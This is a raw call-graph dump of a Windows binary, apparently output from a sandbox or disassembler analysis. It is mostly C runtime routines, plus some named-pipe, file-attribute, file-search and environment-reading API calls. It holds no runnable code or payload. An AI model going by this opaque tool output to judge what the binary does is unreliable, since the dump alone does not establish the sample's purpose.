7ffa535e59ac 8554 7ffa535e59c2 8553->8554 8561 7ffa535e59dd __scrt_fastfail 8553->8561 8555 7ffa535e8380 _get_daylight 15 API calls 8554->8555 8556 7ffa535e59c7 8555->8556 8557 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8556->8557 8571 7ffa535e59d3 8557->8571 8558 7ffa535e59f8 8559 7ffa535e8380 _get_daylight 15 API calls 8558->8559 8559->8571 8561->8553 8561->8554 8561->8558 8565 7ffa535e5a59 8561->8565 8566 7ffa535e8280 17 API calls _isindst 8561->8566 8572 7ffa535eb7e8 8561->8572 8580 7ffa535eaa40 
8561->8580 8586 7ffa535eaa70 8561->8586 8592 7ffa535eaaa0 8561->8592 8567 7ffa535e5ad2 8565->8567 8568 7ffa535e5a72 8565->8568 8566->8561 8569 7ffa535eb824 _isindst 32 API calls 8567->8569 8567->8571 8568->8571 8598 7ffa535eb824 8568->8598 8569->8571 8573 7ffa535eb7f6 8572->8573 8574 7ffa535eb81f 8572->8574 8605 7ffa535ed6a8 EnterCriticalSection 8573->8605 8574->8561 8581 7ffa535eaa49 8580->8581 8582 7ffa535eaa59 8580->8582 8583 7ffa535e8380 _get_daylight 15 API calls 8581->8583 8582->8561 8584 7ffa535eaa4e 8583->8584 8585 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8584->8585 8585->8582 8587 7ffa535eaa79 8586->8587 8591 7ffa535eaa89 8586->8591 8588 7ffa535e8380 _get_daylight 15 API calls 8587->8588 8589 7ffa535eaa7e 8588->8589 8590 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8589->8590 8590->8591 8591->8561 8593 7ffa535eaaa9 8592->8593 8594 7ffa535eaab9 8592->8594 8595 7ffa535e8380 _get_daylight 15 API calls 8593->8595 8594->8561 8596 7ffa535eaaae 8595->8596 8597 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8596->8597 8597->8594 8606 7ffa535ed6a8 EnterCriticalSection 8598->8606 7608 7ffa535e3288 7609 7ffa535e3291 __scrt_acquire_startup_lock 7608->7609 7610 7ffa535e3295 __isa_available_init 7609->7610 7612 7ffa535e7350 7609->7612 7613 7ffa535e7384 7612->7613 7614 7ffa535e736e 7612->7614 7616 7ffa535eea94 49 API calls 7613->7616 7615 7ffa535e8380 _get_daylight 15 API calls 7614->7615 7617 7ffa535e7373 7615->7617 7618 7ffa535e7389 GetModuleFileNameA 7616->7618 7620 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 7617->7620 7619 7ffa535e73b6 7618->7619 7639 7ffa535e7130 7619->7639 7638 7ffa535e737f 7620->7638 7625 7ffa535e740f 7628 7ffa535e7130 36 API calls 7625->7628 7626 7ffa535e73fe 7627 7ffa535e8380 _get_daylight 15 API calls 7626->7627 7637 7ffa535e7403 7627->7637 7629 7ffa535e742b 7628->7629 7631 7ffa535e7474 7629->7631 7632 7ffa535e745b 7629->7632 7629->7637 7630 7ffa535e7e58 __vcrt_freeptd 15 API calls 7630->7638 7635 7ffa535e7e58 
__vcrt_freeptd 15 API calls 7631->7635 7633 7ffa535e7e58 __vcrt_freeptd 15 API calls 7632->7633 7634 7ffa535e7464 7633->7634 7636 7ffa535e7e58 __vcrt_freeptd 15 API calls 7634->7636 7635->7637 7636->7638 7637->7630 7638->7610 7641 7ffa535e716e 7639->7641 7643 7ffa535e71d4 7641->7643 7651 7ffa535e4c78 7641->7651 7642 7ffa535e72c0 7645 7ffa535e72ec 7642->7645 7643->7642 7644 7ffa535e4c78 36 API calls 7643->7644 7644->7643 7646 7ffa535e7307 7645->7646 7647 7ffa535e730b 7645->7647 7646->7625 7646->7626 7647->7646 7648 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 7647->7648 7649 7ffa535e733a 7648->7649 7650 7ffa535e7e58 __vcrt_freeptd 15 API calls 7649->7650 7650->7646 7652 7ffa535e4bd0 7651->7652 7653 7ffa535e4ae8 36 API calls 7652->7653 7654 7ffa535e4bf4 7653->7654 7654->7641 8178 7ffa535f2904 8179 7ffa535f290c 8178->8179 8180 7ffa535f2921 8179->8180 8181 7ffa535f293a 8179->8181 8182 7ffa535e8380 _get_daylight 15 API calls 8180->8182 8183 7ffa535f2931 8181->8183 8185 7ffa535e4ae8 36 API calls 8181->8185 8184 7ffa535f2926 8182->8184 8186 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8184->8186 8185->8183 8186->8183 8187 7ffa535ede00 8188 7ffa535ede26 8187->8188 8189 7ffa535ede3c 8187->8189 8190 7ffa535e8380 _get_daylight 15 API calls 8188->8190 8196 7ffa535edea7 8189->8196 8200 7ffa535ede9a 8189->8200 8209 7ffa535f2864 8189->8209 8217 7ffa535ee00c 8189->8217 8191 7ffa535ede2b 8190->8191 8192 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8191->8192 8195 7ffa535ede35 8192->8195 8194 7ffa535e72ec 15 API calls 8201 7ffa535edf1a 8194->8201 8196->8194 8197 7ffa535edf8f 8199 7ffa535e7e58 __vcrt_freeptd 15 API calls 8197->8199 8199->8200 8202 7ffa535edfd1 8200->8202 8203 7ffa535e7e58 __vcrt_freeptd 15 API calls 8200->8203 8201->8197 8206 7ffa535edff4 8201->8206 8228 7ffa535f1998 8201->8228 8204 7ffa535e7e58 __vcrt_freeptd 15 API calls 8202->8204 8203->8200 8204->8195 8207 7ffa535e8280 _isindst 17 API calls 8206->8207 8208 7ffa535ee008 8207->8208 8210 7ffa535f2883 
8209->8210 8211 7ffa535f28fc 8210->8211 8214 7ffa535f2893 8210->8214 8237 7ffa535f530c 8211->8237 8215 7ffa535f51e0 _FXp_mulh 8 API calls 8214->8215 8216 7ffa535f28f2 8215->8216 8216->8189 8218 7ffa535ee03c 8217->8218 8218->8218 8219 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8218->8219 8220 7ffa535ee086 8219->8220 8221 7ffa535f1998 32 API calls 8220->8221 8222 7ffa535ee0b8 8221->8222 8223 7ffa535e8280 _isindst 17 API calls 8222->8223 8224 7ffa535ee11b __scrt_fastfail 8223->8224 8225 7ffa535ee1d6 FindFirstFileExA 8224->8225 8226 7ffa535ee245 8225->8226 8227 7ffa535ee00c 32 API calls 8226->8227 8233 7ffa535f19ad 8228->8233 8229 7ffa535f19b2 8230 7ffa535e8380 _get_daylight 15 API calls 8229->8230 8231 7ffa535f19c8 8229->8231 8232 7ffa535f19bc 8230->8232 8231->8201 8234 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8232->8234 8233->8229 8233->8231 8235 7ffa535f19f7 8233->8235 8234->8231 8235->8231 8236 7ffa535e8380 _get_daylight 15 API calls 8235->8236 8236->8232 8240 7ffa535f5320 IsProcessorFeaturePresent 8237->8240 8241 7ffa535f5336 8240->8241 8246 7ffa535f53bc RtlCaptureContext RtlLookupFunctionEntry 8241->8246 8247 7ffa535f534a 8246->8247 8248 7ffa535f53ec RtlVirtualUnwind 8246->8248 8249 7ffa535f5204 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8247->8249 8248->8247 8607 7ffa535efa98 8608 7ffa535efac2 8607->8608 8613 7ffa535efacc 8607->8613 8609 7ffa535e4ae8 36 API calls 8608->8609 8608->8613 8610 7ffa535efaff 8609->8610 8610->8613 8619 7ffa535e4b78 8610->8619 8614 7ffa535efb38 8616 7ffa535efb75 8614->8616 8617 7ffa535efb4b MultiByteToWideChar 8614->8617 8615 7ffa535efb89 MultiByteToWideChar 8615->8613 8615->8616 8616->8613 8618 7ffa535e8380 _get_daylight 15 API calls 8616->8618 8617->8613 8617->8616 8618->8613 8620 7ffa535e4ae8 36 API calls 8619->8620 8621 7ffa535e4b8a 8620->8621 8621->8614 8621->8615 8622 7ffa535e5696 8624 7ffa535e56b9 _FXp_mulh 8622->8624 8623 7ffa535e56c7 8627 7ffa535e575f 8623->8627 8628 
7ffa535e570f 8623->8628 8641 7ffa535e56d1 8623->8641 8624->8623 8625 7ffa535e56e1 8624->8625 8626 7ffa535e90cc _FXp_mulh 15 API calls 8625->8626 8626->8641 8629 7ffa535e5764 8627->8629 8634 7ffa535e5771 8627->8634 8643 7ffa535e545c 8628->8643 8631 7ffa535e55d8 15 API calls 8629->8631 8631->8641 8634->8641 8662 7ffa535ea4c4 8634->8662 8638 7ffa535e585f 8639 7ffa535e9570 15 API calls 8638->8639 8640 7ffa535e5877 8639->8640 8666 7ffa535e9728 8640->8666 8644 7ffa535e5473 _FXp_mulh 8643->8644 8645 7ffa535e5487 8644->8645 8646 7ffa535e554f 8644->8646 8649 7ffa535e549a 8644->8649 8645->8649 8673 7ffa535e506c 8645->8673 8647 7ffa535e90cc _FXp_mulh 15 API calls 8646->8647 8647->8649 8650 7ffa535e9570 8649->8650 8651 7ffa535e958c _FXp_mulh 8650->8651 8652 7ffa535e9597 8651->8652 8653 7ffa535e96e2 8651->8653 8655 7ffa535e573f 8652->8655 8656 7ffa535e90cc _FXp_mulh 15 API calls 8652->8656 8654 7ffa535e90cc _FXp_mulh 15 API calls 8653->8654 8654->8655 8657 7ffa535e55d8 8655->8657 8656->8655 8658 7ffa535e9570 15 API calls 8657->8658 8659 7ffa535e55f7 _FXp_mulh 8658->8659 8660 7ffa535e564b 8659->8660 8661 7ffa535e90cc _FXp_mulh 15 API calls 8659->8661 8660->8641 8661->8660 8663 7ffa535ea4e2 8662->8663 8665 7ffa535ea4e7 _FXp_mulh 8662->8665 8713 7ffa535ea640 8663->8713 8665->8638 8667 7ffa535e9746 _FXp_mulh 8666->8667 8668 7ffa535e977c 8667->8668 8670 7ffa535e9790 8667->8670 8671 7ffa535e9786 8667->8671 8669 7ffa535e90cc _FXp_mulh 15 API calls 8668->8669 8669->8671 8670->8671 8672 7ffa535e90cc _FXp_mulh 15 API calls 8670->8672 8671->8641 8672->8671 8674 7ffa535e50ba _FXp_mulh _FXp_setw 8673->8674 8685 7ffa535e50cb _FXp_mulh 8674->8685 8691 7ffa535e51a1 get_acsize _FXp_mulh _FXp_setw 8674->8691 8692 7ffa535e9c0c 8674->8692 8677 7ffa535e5421 8679 7ffa535f51e0 _FXp_mulh 8 API calls 8677->8679 8681 7ffa535e5437 8679->8681 8680 7ffa535e9c0c _FXp_mulh 23 API calls 8682 7ffa535e5248 8680->8682 8681->8649 8701 7ffa535e9b4c 8682->8701 8684 7ffa535e9c0c 23 API calls _FXp_mulh 8684->8691 
8685->8677 8705 7ffa535ea718 8685->8705 8686 7ffa535e534e get_acsize _FXp_mulh 8686->8685 8687 7ffa535e9c0c _FXp_mulh 23 API calls 8686->8687 8689 7ffa535e53d9 8687->8689 8688 7ffa535e9b4c 15 API calls _FXp_addx 8688->8691 8690 7ffa535e9b4c _FXp_addx 15 API calls 8689->8690 8690->8685 8691->8684 8691->8686 8691->8688 8693 7ffa535e9c46 _FXp_mulh 8692->8693 8700 7ffa535e9c9b _FXp_mulh 8692->8700 8696 7ffa535e9c64 8693->8696 8693->8700 8694 7ffa535e9c76 8695 7ffa535f51e0 _FXp_mulh 8 API calls 8694->8695 8697 7ffa535e5218 8695->8697 8696->8694 8698 7ffa535e90cc _FXp_mulh 15 API calls 8696->8698 8697->8680 8697->8691 8698->8694 8699 7ffa535e97f8 15 API calls _FXp_mulh 8699->8700 8700->8694 8700->8699 8702 7ffa535e9b78 8701->8702 8703 7ffa535e9b9c 8701->8703 8702->8703 8709 7ffa535e97f8 8702->8709 8703->8691 8706 7ffa535ea782 8705->8706 8707 7ffa535f0c6c _handle_errorf 24 API calls 8706->8707 8708 7ffa535ea79c 8706->8708 8707->8708 8708->8677 8710 7ffa535e982c _FXp_mulh 8709->8710 8712 7ffa535e987b _FXp_mulh 8709->8712 8711 7ffa535e90cc _FXp_mulh 15 API calls 8710->8711 8710->8712 8711->8712 8712->8702 8716 7ffa535e9ea0 8713->8716 8715 7ffa535ea681 8715->8665 8717 7ffa535e9f0f _FXp_mulh 8716->8717 8718 7ffa535e9f9c 8717->8718 8720 7ffa535e9f7b _FXp_mulh 8717->8720 8723 7ffa535ea340 8717->8723 8722 7ffa535e9fad 8718->8722 8728 7ffa535e9fc2 _FXp_mulh _FXp_setw _fdlogpoly 8718->8728 8719 7ffa535f51e0 _FXp_mulh 8 API calls 8721 7ffa535ea3ba 8719->8721 8720->8719 8721->8715 8724 7ffa535e90cc _FXp_mulh 15 API calls 8722->8724 8723->8720 8725 7ffa535e90cc _FXp_mulh 15 API calls 8723->8725 8724->8720 8725->8720 8726 7ffa535ea0a6 8726->8720 8727 7ffa535e90cc _FXp_mulh 15 API calls 8726->8727 8727->8720 8728->8726 8729 7ffa535e9b4c _FXp_addx 15 API calls 8728->8729 8746 7ffa535ea0dd 8728->8746 8730 7ffa535ea169 8729->8730 8732 7ffa535e9c0c _FXp_mulh 23 API calls 8730->8732 8733 7ffa535ea176 _FXp_setw 8730->8733 8737 7ffa535ea19e 8732->8737 8734 7ffa535e97f8 _FXp_mulh 15 API calls 
8733->8734 8736 7ffa535ea1ff _FXp_setw 8734->8736 8735 7ffa535e9c0c _FXp_mulh 23 API calls 8735->8737 8739 7ffa535e9c0c _FXp_mulh 23 API calls 8736->8739 8737->8733 8737->8735 8738 7ffa535e9b4c _FXp_addx 15 API calls 8737->8738 8738->8737 8740 7ffa535ea227 8739->8740 8741 7ffa535e9c0c _FXp_mulh 23 API calls 8740->8741 8744 7ffa535ea25a _FXp_mulh 8740->8744 8742 7ffa535ea248 8741->8742 8743 7ffa535e9b4c _FXp_addx 15 API calls 8742->8743 8743->8744 8745 7ffa535e97f8 _FXp_mulh 15 API calls 8744->8745 8745->8746 8747 7ffa535f0dcc 8746->8747 8748 7ffa535f0df7 _FXp_mulh 8747->8748 8749 7ffa535f0e1d 8748->8749 8752 7ffa535f0f29 8748->8752 8750 7ffa535f0e55 8749->8750 8751 7ffa535f0e3b 8749->8751 8756 7ffa535f0e5e _FXp_mulh 8749->8756 8750->8726 8753 7ffa535e90cc _FXp_mulh 15 API calls 8751->8753 8752->8750 8754 7ffa535f0f57 8752->8754 8752->8756 8753->8750 8754->8750 8755 7ffa535e90cc _FXp_mulh 15 API calls 8754->8755 8755->8750 8756->8750 8757 7ffa535e90cc _FXp_mulh 15 API calls 8756->8757 8757->8750 8758 7ffa535e4f98 8761 7ffa535e93e0 8758->8761 8760 7ffa535e4fa5 8762 7ffa535e940f _copysign _ctrlfp 8761->8762 8763 7ffa535e943e _ctrlfp 8762->8763 8765 7ffa535eb9a8 8762->8765 8763->8760 8766 7ffa535eb9f2 8765->8766 8767 7ffa535ebd48 _raise_excf RaiseException 8766->8767 8768 7ffa535eba31 _errcode _handle_error 8766->8768 8767->8768 8769 7ffa535eba6c 8768->8769 8770 7ffa535eba4b 8768->8770 8771 7ffa535ec07c _set_errno_from_matherr 15 API calls 8769->8771 8776 7ffa535ec0ac 8770->8776 8773 7ffa535eba6a _ctrlfp 8771->8773 8774 7ffa535f51e0 _FXp_mulh 8 API calls 8773->8774 8775 7ffa535eba91 8774->8775 8775->8763 8777 7ffa535ec0cc 8776->8777 8778 7ffa535ec165 _ctrlfp 8777->8778 8780 7ffa535ec109 _ctrlfp _handle_error 8777->8780 8779 7ffa535ec07c _set_errno_from_matherr 15 API calls 8778->8779 8781 7ffa535ec15d 8779->8781 8780->8781 8782 7ffa535ec07c _set_errno_from_matherr 15 API calls 8780->8782 8781->8773 8782->8781 8250 7ffa535e7014 8257 7ffa535e7e30 8250->8257 8258 
7ffa535e8a30 abort 36 API calls 8257->8258 8261 7ffa535e7e3b 8258->8261 8259 7ffa535e7f58 abort 36 API calls 8260 7ffa535e7e56 8259->8260 8261->8259 8262 7ffa535e3314 8264 7ffa535e3338 __scrt_acquire_startup_lock 8262->8264 8263 7ffa535e6d39 8264->8263 8265 7ffa535e8ac4 _get_daylight 15 API calls 8264->8265 8266 7ffa535e6d62 8265->8266 8267 7ffa535efc10 8268 7ffa535efc3a 8267->8268 8269 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8268->8269 8270 7ffa535efc59 8269->8270 8271 7ffa535e7e58 __vcrt_freeptd 15 API calls 8270->8271 8272 7ffa535efc67 8271->8272 8273 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8272->8273 8276 7ffa535efc91 8272->8276 8275 7ffa535efc83 8273->8275 8277 7ffa535e7e58 __vcrt_freeptd 15 API calls 8275->8277 8278 7ffa535efc9a 8276->8278 8279 7ffa535edb18 8276->8279 8277->8276 8280 7ffa535ed718 __vcrt_uninitialize_ptd 5 API calls 8279->8280 8281 7ffa535edb53 8280->8281 8282 7ffa535edb70 InitializeCriticalSectionAndSpinCount 8281->8282 8283 7ffa535edb5b 8281->8283 8282->8283 8283->8276 8786 7ffa535e4d90 8787 7ffa535e4d98 8786->8787 8788 7ffa535e4ae8 36 API calls 8787->8788 8789 7ffa535e4daa 8788->8789 8791 7ffa535e4db8 8789->8791 8792 7ffa535e4cfc 8789->8792 8793 7ffa535e4d26 8792->8793 8794 7ffa535e4d22 8792->8794 8795 7ffa535e8c80 40 API calls 8793->8795 8794->8791 8795->8794 8284 7ffa535f210c 8285 7ffa535f2120 8284->8285 8286 7ffa535f21a3 8285->8286 8288 7ffa535f0b44 8285->8288 8289 7ffa535f0b84 _ctrlfp _handle_error 8288->8289 8291 7ffa535f0bf0 _handle_error 8289->8291 8299 7ffa535ebd20 8289->8299 8292 7ffa535f0c2d 8291->8292 8293 7ffa535f0bfd 8291->8293 8294 7ffa535ec07c _set_errno_from_matherr 15 API calls 8292->8294 8295 7ffa535f0a20 _handle_error 15 API calls 8293->8295 8296 7ffa535f0c2b _ctrlfp 8294->8296 8295->8296 8297 7ffa535f51e0 _FXp_mulh 8 API calls 8296->8297 8298 7ffa535f0c55 8297->8298 8298->8286 8300 7ffa535ebd48 _raise_excf RaiseException 8299->8300 8301 7ffa535ebd42 8300->8301 8301->8291 8796 7ffa535fb98d 8797 7ffa535fb99f 
8796->8797 8798 7ffa535fb9a9 8796->8798 8800 7ffa535ed6fc LeaveCriticalSection 8797->8800 8302 7ffa535e320c 8303 7ffa535e3228 8302->8303 8304 7ffa535e322d 8302->8304 8306 7ffa535e3628 8303->8306 8307 7ffa535e36bf 8306->8307 8308 7ffa535e3650 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8306->8308 8307->8304 8308->8307 8309 7ffa535e4e0c 8310 7ffa535e4e14 8309->8310 8311 7ffa535e4e29 8310->8311 8313 7ffa535e4e42 8310->8313 8312 7ffa535e8380 _get_daylight 15 API calls 8311->8312 8314 7ffa535e4e2e 8312->8314 8315 7ffa535e4ae8 36 API calls 8313->8315 8316 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8314->8316 8317 7ffa535e4e39 8315->8317 8316->8317 8805 7ffa535e8b64 8812 7ffa535ed9a8 8805->8812 8808 7ffa535e8b7f 8809 7ffa535e8ac4 _get_daylight 15 API calls 8810 7ffa535e8b88 8809->8810 8810->8808 8811 7ffa535e8ba0 __vcrt_uninitialize_ptd 6 API calls 8810->8811 8811->8808 8813 7ffa535ed718 __vcrt_uninitialize_ptd 5 API calls 8812->8813 8814 7ffa535ed9d4 8813->8814 8815 7ffa535ed9ec TlsAlloc 8814->8815 8816 7ffa535e8b74 8814->8816 8815->8816 8816->8808 8816->8809 8318 7ffa535f12e5 8319 7ffa535f1316 8318->8319 8320 7ffa535f14ac 8318->8320 8319->8320 8321 7ffa535f1497 8319->8321 8324 7ffa535f134e 8319->8324 8323 7ffa535f22a8 _log_special 24 API calls 8320->8323 8325 7ffa535f14aa 8320->8325 8326 7ffa535f22a8 8321->8326 8323->8325 8329 7ffa535f22c8 8326->8329 8330 7ffa535f22e2 8329->8330 8331 7ffa535f22c3 8330->8331 8332 7ffa535f0c6c _handle_errorf 24 API calls 8330->8332 8331->8325 8332->8331 8333 7ffa535fb9e3 8336 7ffa535efd98 LeaveCriticalSection 8333->8336 8337 7ffa535e36e4 8338 7ffa535e4378 InterlockedFlushSList 8337->8338 8339 7ffa535e4389 8338->8339 8340 7ffa535e439c 8338->8340 8339->8340 8341 7ffa535e7e58 __vcrt_freeptd 15 API calls 8339->8341 8341->8339 8817 7ffa535ed660 8818 7ffa535ed668 8817->8818 8819 7ffa535edb18 6 API calls 8818->8819 8820 7ffa535ed699 8818->8820 8821 7ffa535ed695 8818->8821 8819->8818 8823 
7ffa535ed6c4 8820->8823 8824 7ffa535ed6ef 8823->8824 8825 7ffa535ed6d2 DeleteCriticalSection 8824->8825 8826 7ffa535ed6f3 8824->8826 8825->8824 8826->8821 8827 7ffa535e545e 8828 7ffa535e5473 _FXp_mulh 8827->8828 8829 7ffa535e5487 8828->8829 8830 7ffa535e554f 8828->8830 8833 7ffa535e549a 8828->8833 8832 7ffa535e506c 24 API calls 8829->8832 8829->8833 8831 7ffa535e90cc _FXp_mulh 15 API calls 8830->8831 8831->8833 8832->8833 8342 7ffa535e6ee0 8343 7ffa535e6f06 GetModuleHandleW 8342->8343 8344 7ffa535e6f50 8342->8344 8343->8344 8348 7ffa535e6f13 8343->8348 8360 7ffa535ed6a8 EnterCriticalSection 8344->8360 8348->8344 8355 7ffa535e7098 GetModuleHandleExW 8348->8355 8356 7ffa535e70dc 8355->8356 8357 7ffa535e70c2 GetProcAddress 8355->8357 8358 7ffa535e70f9 8356->8358 8359 7ffa535e70f3 FreeLibrary 8356->8359 8357->8356 8358->8344 8359->8358 8838 7ffa535fb25c 8839 7ffa535fb2b3 GetCurrentThreadId 8838->8839 8840 7ffa535fb2c3 8838->8840 8839->8840 8361 7ffa535f14f9 8362 7ffa535f14ac 8361->8362 8363 7ffa535f14bf 8362->8363 8364 7ffa535f22a8 _log_special 24 API calls 8362->8364 8364->8363 8365 7ffa535e1cf8 8366 7ffa535e1d6f 8365->8366 8367 7ffa535e1d87 GetCurrentThreadId 8366->8367 8374 7ffa535e1fb9 8366->8374 8368 7ffa535e1d9e 8367->8368 8367->8374 8377 7ffa535f5694 8368->8377 8370 7ffa535e1e53 8371 7ffa535e1fcf 8370->8371 8372 7ffa535e1e7e 8370->8372 8370->8374 8371->8374 8389 7ffa535f615c 8371->8389 8372->8374 8383 7ffa535f59e8 8372->8383 8378 7ffa535f5727 8377->8378 8379 7ffa535f58d1 8377->8379 8381 7ffa535f615c 3 API calls 8378->8381 8380 7ffa535f615c 3 API calls 8379->8380 8382 7ffa535f578a 8380->8382 8381->8382 8382->8370 8385 7ffa535f5aaf 8383->8385 8388 7ffa535f5ad4 8383->8388 8384 7ffa535f5f42 __scrt_fastfail 8384->8374 8387 7ffa535f5eb8 SetFileAttributesA 8385->8387 8385->8388 8386 7ffa535f615c 3 API calls 8386->8388 8387->8385 8387->8387 8388->8384 8388->8386 8390 7ffa535f6220 8389->8390 8391 7ffa535e206b WaitNamedPipeA 8389->8391 8390->8391 8392 7ffa535f6347 
DisconnectNamedPipe 8390->8392 8393 7ffa535f637b 8390->8393 8391->8371 8391->8374 8392->8393 8393->8391 8394 7ffa535f9404 2 API calls 8393->8394 8394->8391 8841 7ffa535fb873 __scrt_dllmain_exception_filter 8842 7ffa535f1673 8843 7ffa535f22a8 _log_special 24 API calls 8842->8843 8844 7ffa535f1688 8843->8844 8395 7ffa535f21f0 8398 7ffa535f2210 8395->8398 8399 7ffa535f222a 8398->8399 8400 7ffa535f220b 8399->8400 8401 7ffa535f0b44 _handle_error 24 API calls 8399->8401 8401->8400 8402 7ffa535e40f0 8404 7ffa535e412e _IsNonwritableInCurrentImage __C_specific_handler 8402->8404 8403 7ffa535e4211 8404->8403 8405 7ffa535e41dc RtlUnwindEx 8404->8405 8405->8404 8845 7ffa535e886c 8846 7ffa535e8871 8845->8846 8847 7ffa535e8886 8845->8847 8848 7ffa535e888c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 8846->8848 8849 7ffa535e887e 8848->8849 8850 7ffa535e7e58 __vcrt_freeptd 15 API calls 8849->8850 8850->8847 8406 7ffa535f20eb 8407 7ffa535f20f6 8406->8407 8409 7ffa535f20f9 8406->8409 8408 7ffa535f21a3 8409->8408 8410 7ffa535f0b44 _handle_error 24 API calls 8409->8410 8410->8408 8851 7ffa535f466b 8852 7ffa535f4910 8851->8852 8853 7ffa535f46ab 8851->8853 8854 7ffa535f4906 8852->8854 8858 7ffa535f21d0 _log10_special 24 API calls 8852->8858 8853->8852 8855 7ffa535f46df 8853->8855 8856 7ffa535f48f2 8853->8856 8859 7ffa535f21d0 8856->8859 8858->8854 8860 7ffa535f2210 _log10_special 24 API calls 8859->8860 8861 7ffa535f21eb 8860->8861 8861->8854 8411 7ffa535ee2c8 8412 7ffa535ee2e9 8411->8412 8413 7ffa535ee2f0 8411->8413 8414 7ffa535ee329 8413->8414 8415 7ffa535ee2f7 8413->8415 8414->8412 8422 7ffa535ef334 8414->8422 8416 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8415->8416 8417 7ffa535ee302 8416->8417 8419 7ffa535e7e58 __vcrt_freeptd 15 API calls 8417->8419 8419->8412 8420 7ffa535ee354 8421 7ffa535e7e58 __vcrt_freeptd 15 API calls 8420->8421 8421->8412 8423 7ffa535ef33c 8422->8423 8424 7ffa535ef37b 8423->8424 8425 7ffa535ef36c 8423->8425 8426 7ffa535ef385 8424->8426 
8431 7ffa535f2ec8 8424->8431 8427 7ffa535e8380 _get_daylight 15 API calls 8425->8427 8438 7ffa535f2f04 8426->8438 8430 7ffa535ef371 __scrt_fastfail 8427->8430 8430->8420 8432 7ffa535f2ed1 8431->8432 8433 7ffa535f2eea HeapSize 8431->8433 8434 7ffa535e8380 _get_daylight 15 API calls 8432->8434 8435 7ffa535f2ed6 8434->8435 8436 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8435->8436 8437 7ffa535f2ee1 8436->8437 8437->8426 8439 7ffa535f2f19 8438->8439 8440 7ffa535f2f23 8438->8440 8441 7ffa535e7e98 _onexit 16 API calls 8439->8441 8442 7ffa535f2f28 8440->8442 8448 7ffa535f2f2f __vcrt_getptd_noexit 8440->8448 8447 7ffa535f2f21 8441->8447 8443 7ffa535e7e58 __vcrt_freeptd 15 API calls 8442->8443 8443->8447 8444 7ffa535f2f6e 8446 7ffa535e8380 _get_daylight 15 API calls 8444->8446 8445 7ffa535f2f58 HeapReAlloc 8445->8447 8445->8448 8446->8447 8447->8430 8448->8444 8448->8445 8449 7ffa535ef4e8 __vcrt_getptd_noexit 2 API calls 8448->8449 8449->8448 8454 7ffa535f12c6 8455 7ffa535f3550 24 API calls 8454->8455 8456 7ffa535f12d2 8455->8456 8456->8456 7194 7ffa535e74c8 7195 7ffa535e74e5 7194->7195 7196 7ffa535e74dc 7194->7196 7196->7195 7200 7ffa535e7510 7196->7200 7201 7ffa535e7529 7200->7201 7202 7ffa535e74ee 7200->7202 7221 7ffa535eea94 7201->7221 7202->7195 7212 7ffa535e76bc 7202->7212 7207 7ffa535e753b 7210 7ffa535e7e58 __vcrt_freeptd 15 API calls 7207->7210 7210->7202 7214 7ffa535e76db 7212->7214 7216 7ffa535e7712 7212->7216 7213 7ffa535e76e3 WideCharToMultiByte 7213->7214 7213->7216 7214->7195 7215 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 7215->7216 7216->7213 7216->7214 7216->7215 7217 7ffa535e7727 WideCharToMultiByte 7216->7217 7218 7ffa535e7782 7216->7218 7220 7ffa535e7e58 __vcrt_freeptd 15 API calls 7216->7220 7217->7216 7217->7218 7219 7ffa535e7e58 __vcrt_freeptd 15 API calls 7218->7219 7219->7214 7220->7216 7222 7ffa535e752e 7221->7222 7223 7ffa535eeaa1 7221->7223 7225 7ffa535eee4c GetEnvironmentStringsW 7222->7225 7260 7ffa535ee8dc 7223->7260 7226 
7ffa535eef1e 7225->7226 7227 7ffa535eee7a WideCharToMultiByte 7225->7227 7230 7ffa535eef28 FreeEnvironmentStringsW 7226->7230 7231 7ffa535e7533 7226->7231 7227->7226 7229 7ffa535eeed4 7227->7229 7232 7ffa535e7e98 _onexit 16 API calls 7229->7232 7230->7231 7231->7207 7237 7ffa535e757c 7231->7237 7233 7ffa535eeedc 7232->7233 7234 7ffa535eeee4 WideCharToMultiByte 7233->7234 7235 7ffa535eef0b 7233->7235 7234->7235 7236 7ffa535e7e58 __vcrt_freeptd 15 API calls 7235->7236 7236->7226 7238 7ffa535e759d 7237->7238 7239 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 7238->7239 7240 7ffa535e75cb 7239->7240 7242 7ffa535e763a 7240->7242 7244 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 7240->7244 7245 7ffa535e762b 7240->7245 7250 7ffa535e7662 7240->7250 7252 7ffa535e7e58 __vcrt_freeptd 15 API calls 7240->7252 7593 7ffa535e7ef8 7240->7593 7241 7ffa535e7e58 __vcrt_freeptd 15 API calls 7243 7ffa535e7548 7241->7243 7242->7241 7254 7ffa535e7e58 7243->7254 7244->7240 7602 7ffa535e7678 7245->7602 7249 7ffa535e7e58 __vcrt_freeptd 15 API calls 7249->7242 7251 7ffa535e8280 _isindst 17 API calls 7250->7251 7253 7ffa535e7674 7251->7253 7252->7240 7255 7ffa535e7e8d __vcrt_freeptd 7254->7255 7256 7ffa535e7e5d HeapFree 7254->7256 7255->7207 7256->7255 7257 7ffa535e7e78 7256->7257 7258 7ffa535e8380 _get_daylight 13 API calls 7257->7258 7259 7ffa535e7e7d GetLastError 7258->7259 7259->7255 7280 7ffa535e8a30 GetLastError 7260->7280 7262 7ffa535ee8f5 7300 7ffa535eeabc 7262->7300 7267 7ffa535ee918 7267->7222 7270 7ffa535e7e58 __vcrt_freeptd 15 API calls 7270->7267 7273 7ffa535ee9bf 7335 7ffa535e8380 7273->7335 7275 7ffa535eea21 7279 7ffa535ee9c4 